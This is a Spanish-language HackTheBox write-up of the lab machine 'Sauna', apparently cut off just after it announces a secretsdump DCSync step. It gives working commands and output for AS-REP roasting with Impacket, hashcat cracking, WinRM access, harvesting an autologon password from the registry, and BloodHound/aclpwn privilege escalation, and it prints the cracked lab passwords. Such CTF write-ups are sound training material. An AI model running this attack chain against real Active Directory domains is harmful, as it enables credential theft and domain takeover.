Sauna una maquina de HackTheBox, encontramos usuarios los cuales utilizamos para crear un wordlist personalizado y realizar ASREPRoast con Impacket lo que nos dio acceso por WinRM. Accedimos a un segundo usuario con una contraseña que encontramos en el registro de windows. Finalmente enumeramos con BloodHound y con la informacion recolectada obtuvimos acceso con ACLPwn para luego realizar Pass-the-Hash y obtener acceso privilegiado con PSExec.

Informacion de la Maquina

Nombre	Sauna
OS	Windows
Puntos	20
Dificultad	Facil
IP	10.10.10.175
Maker	egotisticalSW
Matrix	{ "type":"radar", "data":{ "labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"], "datasets":[ { "label":"User Rate", "data":[8.2, 7.9, 6.6, 3.4, 2.1], "backgroundColor":"rgba(75, 162, 189,0.5)", "borderColor":"#4ba2bd" }, { "label":"Maker Rate", "data":[10, 10, 10, 0, 0], "backgroundColor":"rgba(154, 204, 20,0.5)", "borderColor":"#9acc14" } ] }, "options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"}, "angleLines":{"color":"rgba(255, 255, 255,0.6)"}, "gridLines":{"color":"rgba(255, 255, 255,0.6)"} } } }

NMAP

Escaneo de puerto tcp, en el cual nos muestra varios puertos abiertos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32


# Nmap 7.80 scan initiated Tue Feb 25 00:32:17 2020 as: nmap -p- --min-rate 1000 -sV -o nmap_scan 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.23s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-25 14:36:02Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
55601/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/25%Time=5E54C001%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 25 00:37:01 2020 -- 1 IP address (1 host up) scanned in 283.37 seconds

NMAP LDAP

Utilizamos el script ldap-search de nmap, y encontramos mucha informacion.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90


# Nmap 7.80 scan initiated Tue Feb 25 00:41:12 2020 as: nmap --script=ldap-search -p389 -o nmap_ldap_script 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.083s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search: 
|   Context: DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: DC=EGOTISTICAL-BANK,DC=LOCAL
|         objectClass: top
|         objectClass: domain
|         objectClass: domainDNS
|         distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
|         instanceType: 5
|         whenCreated: 2020/01/23 05:44:25 UTC
|         whenChanged: 2020/02/25 14:32:31 UTC
|         subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
|         subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
|         subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         uSNCreated: 4099
|         dSASignature: \x01\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xBE\xE0\xB3\xC6%\xECD\xB2\xB9\x9F\xF8\D\xB2\xEC
|         uSNChanged: 53269
|         name: EGOTISTICAL-BANK
|         objectGUID: 504e6ec-c122-a143-93c0-cf487f83363
|         replUpToDateVector: \x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xFDZ\x85\x92F\xDE^A\xAAVnj@#\xF6\x0C\x0B\xD0\x00\x00\x00\x00\x00\x00\xFE\xC0e\x14\x03\x00\x00\x00@\xBE\xE0\xB3\xC6%\xECD\xB2\xB9\x9F\xF8\D\xB2\xEC	\xB0\x00\x00\x00\x00\x00\x00\xD4\x04R\x14\x03\x00\x00\x00
|         creationTime: 132271147519409907
|         forceLogoff: -9223372036854775808
|         lockoutDuration: -18000000000
|         lockOutObservationWindow: -18000000000
|         lockoutThreshold: 0
|         maxPwdAge: -36288000000000
|         minPwdAge: -864000000000
|         minPwdLength: 7
|         modifiedCountAtLastProm: 0
|         nextRid: 1000
|         pwdProperties: 1
|         pwdHistoryLength: 24
|         objectSid: 1-5-21-2966785786-3096785034-1186376766
|         serverState: 1
|         uASCompat: 1
|         modifiedCount: 1
|         auditingPolicy: \x00\x01
|         nTMixedDomain: 0
|         rIDManagerReference: CN=RID Manager$,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
|         fSMORoleOwner: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         systemFlags: -1946157056
|         wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
|         objectCategory: CN=Domain-DNS,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         isCriticalSystemObject: TRUE
|         gPLink: [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL;0]
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         otherWellKnownObjects: B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
|         otherWellKnownObjects: B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
|         masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         ms-DS-MachineAccountQuota: 10
|         msDS-Behavior-Version: 7
|         msDS-PerUserTrustQuota: 1
|         msDS-AllUsersTrustQuota: 1000
|         msDS-PerUserTrustTombstonesQuota: 10
|         msDs-masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         msDS-IsDomainFor: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         msDS-NcType: 0
|         msDS-ExpirePasswordsOnSmartCardOnlyAccounts: TRUE
|         dc: EGOTISTICAL-BANK
|     dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
|_    dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

# Nmap done at Tue Feb 25 00:41:13 2020 -- 1 IP address (1 host up) scanned in 1.03 seconds

USER - FSmith

En el puerto 80 esta corriendo una pagina en la cual podemos obtener los nombres de las personas que pertenecen a esta empresa, utilizando estos nombres creamos un diccionario con diferentes conbinaciones entre si, en el reporte de nmap con el script de ldap-search podemos ver otro nombre ‘Hugo Smith’ el cual vamos a agregar a nuestro diccionario de nombres.

Testing for Weak password policy

Nombres

Combinacion de nombres de usuarios con script de python:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


#!/usr/bin/env python
import sys

if __name__ == "__main__": 
	if len(sys.argv) != 2:
		print "usage: %s names.txt" % (sys.argv[0])
		sys.exit(0)

	for line in open(sys.argv[1]):
		name = ''.join([c for c in line if  c == " " or  c.isalpha()])

		tokens = name.lower().split()
		fname = tokens[0]
		lname = tokens[-1]

		print fname + lname		# johndoe
		print lname + fname		# doejohn
		print fname + "." + lname	# john.doe
		print lname + "." + fname	# doe.john
		print lname + fname[0]		# doej
		print fname[0] + lname		# jdoe
		print lname[0] + fname		# djoe
		print fname[0] + "." + lname	# j.doe
		print lname[0] + "." + fname	# d.john
		print fname			# john

Utilizamos GetNPUsers de impacket para obtener informacion de LDAP junto con la lista de usuarios sin autenticacion:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21


root@aoiri:~/htb/sauna# python /root/tools/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -usersfile list_users.txt -request -format hashcat -outputfile hashes.asreproast
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

[... snip ...]

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

[... snip ...]

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:42fc70db3f5d9b26862ee8a381f41300$bfc70df530d642039f9c1135e399e4cf27e8ddb75f8a2dbc9b37b4b66226b9d733452368075ea1bfee410a0e18430b2320407c02aa161cd9be0ed96285ced026eb233fbfa2e9b65991321c6d9c4bf9556f32759eb9fe92f239b91543a2f96e643e2f30fe3c8b59c83e39104a3134c165feec05d2d993962a716e495b9c629a63d9e35355337d280ec389ef730495aead980f9a5a9654c9f356553ca484c2014a411a2e812906a6a1ba7e133456cf0bf532d2d682d451e8577f35c6059474e6829e5d0e3bfed887828cbe7efb36d946e13ed6a2aa67ca2819e587d68386244d055998571d4a5a5831935e47dfdac4caf73072c6592af0ad0226e94e3657b71e40
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

[... snip ...]

root@aoiri:~/htb/sauna#

Hashes capturadas

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:a9fd61a55cd08ff4f2298bf6d2eaea41$9b8899d4f678c22f5171bb699d87d51a08520d8206cc6967017f65bee3fb3d814855da6929a1691b6fb3d430cf0ee2697022ecce332fd29d3af31fce8766b67d90ead50310c7238dd9a6a48478fc0d25c1c0a8e8cea418795d36d56b8c6c2069f0aad851172a4dedeb7c5898a44e36401383718caaaaab04a670d4dbd6ef42f84bf097f4e180cb9cc9b00b497e6a758aa5084aa46d9f365d6f5896eea79954e553510369d1bfaeed9a1f4ce63125aeddcc1a533c16e19047a211457455470338e12d2e970a234a98203e9808c67a2b97356f4d89d8da0d115c91fd5a294b7daf2c69321b4ac2d6dfa38f470fd1f9854148342442ca44437c1c099c39db5fdd5a

Utilizamos hashcat para crackear la contraseña:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61


➜  hashcat ./hashcat64.bin -m 18200 sauna_hash ../rockyou.txt -o sauna_cracked.txt 
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce MX130, 501/2004 MB allocatable, 3MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

Dictionary cache hit:
* Filename..: ../rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => 
                                               
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:a9fd61a...5fdd5a
Time.Started.....: Wed Feb 26 15:45:34 2020 (6 secs)
Time.Estimated...: Wed Feb 26 15:45:40 2020 (0 secs)
Guess.Base.......: File (../rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2115.6 kH/s (9.59ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10567680/14344385 (73.67%)
Rejected.........: 0/10567680 (0.00%)
Restore.Point....: 10518528/14344385 (73.33%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: VALERIA05 -> TGWild\\
Hardware.Mon.#1..: Temp: 57c Util: 37% Core:1189MHz Mem:2505MHz Bus:4

Started: Wed Feb 26 15:45:26 2020
Stopped: Wed Feb 26 15:45:41 2020
➜  hashcat cat sauna_cracked.txt 
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:a9fd61a55cd08ff4f2298bf6d2eaea41$9b8899d4f678c22f5171bb699d87d51a08520d8206cc6967017f65bee3fb3d814855da6929a1691b6fb3d430cf0ee2697022ecce332fd29d3af31fce8766b67d90ead50310c7238dd9a6a48478fc0d25c1c0a8e8cea418795d36d56b8c6c2069f0aad851172a4dedeb7c5898a44e36401383718caaaaab04a670d4dbd6ef42f84bf097f4e180cb9cc9b00b497e6a758aa5084aa46d9f365d6f5896eea79954e553510369d1bfaeed9a1f4ce63125aeddcc1a533c16e19047a211457455470338e12d2e970a234a98203e9808c67a2b97356f4d89d8da0d115c91fd5a294b7daf2c69321b4ac2d6dfa38f470fd1f9854148342442ca44437c1c099c39db5fdd5a:Thestrokes23
➜  hashcat

SMBMAP

Utilizamos smbmap con las credenciales que encontramos para enumerar los SHARENAMES a los que el usuario fsmith puede acceder.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68


root@aoiri:~/htb/sauna# smbmap -H 10.10.10.175 -u fsmith -p 'Thestrokes23'
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.175...
[+] IP: 10.10.10.175:445	Name: 10.10.10.175                                      
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	.                                                  
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	InitShutdown
	fr--r--r--                4 Sun Dec 31 17:57:56 1600	lsass
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	ntsvcs
	fr--r--r--                4 Sun Dec 31 17:57:56 1600	scerpc
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	Winsock2\CatalogChangeListener-360-0
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	epmapper
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	Winsock2\CatalogChangeListener-1cc-0
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	LSM_API_service
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	eventlog
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	Winsock2\CatalogChangeListener-420-0
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	atsvc
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	Winsock2\CatalogChangeListener-5b0-0
	fr--r--r--                4 Sun Dec 31 17:57:56 1600	wkssvc
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	Winsock2\CatalogChangeListener-260-0
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	Winsock2\CatalogChangeListener-260-1
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	RpcProxy\49670
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	b75206e9c2133cf5
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	RpcProxy\593
	fr--r--r--                4 Sun Dec 31 17:57:56 1600	srvsvc
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	spoolss
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	Winsock2\CatalogChangeListener-b94-0
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	netdfs
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	vgauth-service
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	Winsock2\CatalogChangeListener-250-0
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	ROUTER
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	Winsock2\CatalogChangeListener-8f4-0
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	Winsock2\CatalogChangeListener-7d4-0
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
	fr--r--r--                3 Sun Dec 31 17:57:56 1600	W32TIME_ALT
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	PSHost.132272457929604436.3680.DefaultAppDomain.wsmprovhost
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	iisipm8edc73b6-375e-4404-816c-f06e9ca4e3d2
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	iislogpipe5ec33ab0-ed89-4506-a437-f8c09f25dfcb
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	PSHost.132272481319626253.3316.DefaultAppDomain.wsmprovhost
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	PSHost.132272541365899156.5756.DefaultAppDomain.wsmprovhost
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	PSHost.132272546170148799.3268.DefaultAppDomain.wsmprovhost
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	PSHost.132272548732993844.5392.DefaultAppDomain.wsmprovhost
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	PSHost.132272549933510639.4140.DefaultAppDomain.wsmprovhost
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	PSHost.132272556670204143.3228.DefaultAppDomain.wsmprovhost
	fr--r--r--                1 Sun Dec 31 17:57:56 1600	PSHost.132272557556503609.1872.DefaultAppDomain.wsmprovhost
	IPC$                                              	READ ONLY	Remote IPC
	.                                                  
	dr--r--r--                0 Wed Jan 22 23:44:49 2020	.
	dr--r--r--                0 Wed Jan 22 23:44:49 2020	..
	NETLOGON                                          	READ ONLY	Logon server share 
	.                                                  
	dr--r--r--                0 Wed Jan 22 23:32:39 2020	.
	dr--r--r--                0 Wed Jan 22 23:32:39 2020	..
	dr--r--r--                0 Wed Jan 22 23:29:26 2020	color
	dr--r--r--                0 Wed Jan 22 23:32:39 2020	IA64
	dr--r--r--                0 Thu Jan 23 17:10:43 2020	W32X86
	dr--r--r--                0 Thu Jan 23 17:10:42 2020	x64
	print$                                            	READ ONLY	Printer Drivers
	RICOH Aficio SP 8300DN PCL 6                      	NO ACCESS	We cant print money
	.                                                  
	dr--r--r--                0 Wed Jan 22 23:44:49 2020	.
	dr--r--r--                0 Wed Jan 22 23:44:49 2020	..
	dr--r--r--                0 Wed Jan 22 23:44:49 2020	EGOTISTICAL-BANK.LOCAL
	SYSVOL                                            	READ ONLY	Logon server share 
root@aoiri:~/htb/sauna#

Vemos que tiene permisos de solo lectura en IPC$, NETLOGON, print$ y SYSVOL.

EVIL-WINRM

Ya que esta abierto el puerto 5985 de winrm utilizamos las credenciales y evilwinrm para obtener una shell y con ello nuestra flag user.txt.

USER - svc_loanmgr

Hacemos una enumeracion para buscar contraseñas utilizando querys en el registro de windows con comandos de PayloadsAlltheThings.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59


*Evil-WinRM* PS C:\Users\FSmith\Documents> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ    
    LegalNoticeText    REG_SZ    
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x8e3982368
    ShutdownFlags    REG_DWORD    0x80000027
    DisableLockWorkstation    REG_DWORD    0x0
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
*Evil-WinRM* PS C:\Users\FSmith\Documents> 

Encontramos una contraseña del usuario svc_loanmanager:

DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
DefaultPassword    REG_SZ    Moneymakestheworldgoround!

Los usuarios registrados en la maquina aparece svc_loanmgr como usuario, pero en el query aparece svc_loanmanager por lo que suponemos que la contraseña pertenece a svc_loanmgr:

*Evil-WinRM* PS C:\Users\FSmith\Documents> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest                    
HSmith                   krbtgt                   svc_loanmgr              
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\FSmith\Documents> 

Utilizamos EvilWinrm con las credenciales de svc_loanmgr:

PRIVILEGE ESCALATION

Utilizamos Bloodhound.py para obtener informacion con el usuario svc_loanmgr importamos los datos a bloodhound, luego de esto utilizamos Aclpwn.py para poder encontrar una ruta para obtener privilegios de administrador de la misma forma que la maquina Forest de HackTheBox.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


root@aoiri:~/tools/BloodHound.py/sauna# python ../bloodhound -u svc_loanmgr -p 'Moneymakestheworldgoround!' -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c all
INFO: Found AD domain: egotistical-bank.local
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 6 users
INFO: Connecting to GC LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 01M 15S
root@aoiri:~/tools/BloodHound.py/sauna# zip -r sauna.zip *.json
updating: computers.json (deflated 75%)
updating: domains.json (deflated 85%)
updating: groups.json (deflated 95%)
updating: users.json (deflated 92%)
root@aoiri:~/tools/BloodHound.py/sauna#

Bloodhound

1
2
3
4
5
6
7


root@aoiri:~/tools/aclpwn.py# python aclpwn.py -f svc_loanmgr -p 'Moneymakestheworldgoround!' -ft user -t EGOTISTICAL-BANK.LOCAL -tt domain -d EGOTISTICAL-BANK.LOCAL -du neo4j -dp root -s 10.10.10.175
Please supply the password or LM:NTLM hashes of the account you are escalating from: 
[+] Path found!
Path: (SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL)-[GetChangesAll]->(EGOTISTICAL-BANK.LOCAL)
[-] DCSync -> continue
[+] Finished running tasks
root@aoiri:~/tools/aclpwn.py# 

En la ejecucion de Aclpwn nos aparece que el usuario svc_loanmgr ya tiene permisos para ejecutar DCSync. Sabiendo esto, utilizamos secretsdump.py de impacket para obtener los hashes de los usuarios registrados en la maquina.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
